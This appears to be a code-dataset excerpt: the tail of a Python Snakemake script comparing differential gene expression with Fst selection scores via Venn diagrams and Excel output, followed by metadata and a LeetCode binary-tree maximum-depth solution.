set_colors=('r', 'g'),
alpha = 0.5);
venn2_circles(subsets = (group1, group2, nboth))
plt.title(f"{name}")
plt.savefig(f"results/venn/{name}_{stat}.venn.png")
plt.close()
def intersect2(one, two, df, write=True, path=None):
inter = [x for x in list(one.GeneID) if x in list(two.GeneID)]
length = len(inter)
intersected_df = df[df.GeneID.isin(inter)]
intersected_df.to_csv(f"{path}", sep="\t")
return(length, intersected_df)
def add_columns_xlsx(name, de, fst, highfst, diffsnps, diffsnpsdf=None):
rnaxlsx = pd.read_excel("results/genediff/RNA-Seq_diff.xlsx",
sheet_name=name)
highfst_bool = de.GeneID.isin(highfst.GeneID).astype(str)
rnaxlsx['HighFst'] = highfst_bool
if diffsnps:
diffsnps_bool = de.GeneID.isin(diffsnpsdf.GeneID).astype(str)
rnaxlsx['DiffSNPs'] = diffsnps_bool
# add column of number of SNPs
merged = pd.merge(de, fst, how="outer")
rnaxlsx['nSNPs'] = merged['nSNPs']
return(rnaxlsx)
#### Main ####
# Read contrasts in and other snakemake params
comparisons = pd.DataFrame(snakemake.params['DEcontrasts'], columns=['contrast'])
comparisons = comparisons.contrast.str.split("_", expand=True)
comparisons = [list(row) for i,row in comparisons.iterrows()]
percentile = snakemake.params['percentile']
diffsnps = snakemake.params['diffsnps']
# Create a Pandas Excel writer using XlsxWriter as the engine.
writer = pd.ExcelWriter('results/RNA-Seq-full.xlsx', engine='xlsxwriter')
#### Differential expression v Fst venn diagram
for comp1,comp2 in comparisons:
name = comp1 + "_" + comp2
print(f"\n-------------- Venn Diagram for {name} --------------")
de = pd.read_csv(f"results/genediff/{name}.csv")
fst = pd.read_csv("results/variantAnalysis/selection/FstPerGene.tsv", sep="\t")
#compare sig DE genes and top 5% fst genes?
#get sig up and down diffexp genes
sigde = de[de['padj'] < pval_threshold]
sigde_up = sigde[sigde['FC'] > upper_fc]
sigde_down = sigde[sigde['FC'] < lower_fc]
#take top percentile of fst genes
highfst = fst.nlargest(int(fst.shape[0]*percentile),f"{name}_zFst")
#how many fst? how many sig de up and down?
nfst = highfst.shape[0]
nde_up = sigde_up.shape[0]
nde_down = sigde_down.shape[0]
print(f"There are {nde_up} significantly upregulated genes in {name}")
print(f"There are {nde_down} significantly downregulated genes in {name}")
nboth, _ = intersect2(sigde_up,
highfst,
de,
write=True,
path=f"results/venn/{name}.DE.Fst.intersection.tsv")
###### XLSX file ######
if diffsnps:
diffsnpsDE = pd.read_csv("results/diffsnps/{name}.sig.kissDE.tsv", sep="\t")
sheet = add_columns_xlsx(name, de, fst, highfst, diffsnps, diffsnpsDE)
else:
sheet = add_columns_xlsx(name, de, fst, highfst, diffsnps, diffsnpsDE=None)
# Write each dataframe to a different worksheet.
sheet.to_excel(writer, sheet_name=name)
# Close the Pandas Excel writer and output the Excel file.
writer.save() | 1,320 | 0 | 73 |
d9d99c47ac71fe23afdeb2996eb3a11528a72814 | 464 | py | Python | 104. Maximum Depth of Binary Tree.py | JazzikPeng/Algorithm-in-Python | 915135b1cdd02a6bb8d7068a54b2f497b2ec31d4 | [
"MIT"
] | 3 | 2018-02-05T06:15:57.000Z | 2019-04-07T23:33:07.000Z | 104. Maximum Depth of Binary Tree.py | JazzikPeng/Algorithm-in-Python | 915135b1cdd02a6bb8d7068a54b2f497b2ec31d4 | [
"MIT"
] | null | null | null | 104. Maximum Depth of Binary Tree.py | JazzikPeng/Algorithm-in-Python | 915135b1cdd02a6bb8d7068a54b2f497b2ec31d4 | [
"MIT"
] | null | null | null | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None | 24.421053 | 42 | 0.482759 | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def maxDepth(self, root):
"""
:type root: TreeNode
:rtype: int
"""
if root is None:
return 0
else:
l = self.maxDepth(root.left)
r = self.maxDepth(root.right)
return max(l, r) + 1 | 0 | 279 | 24 |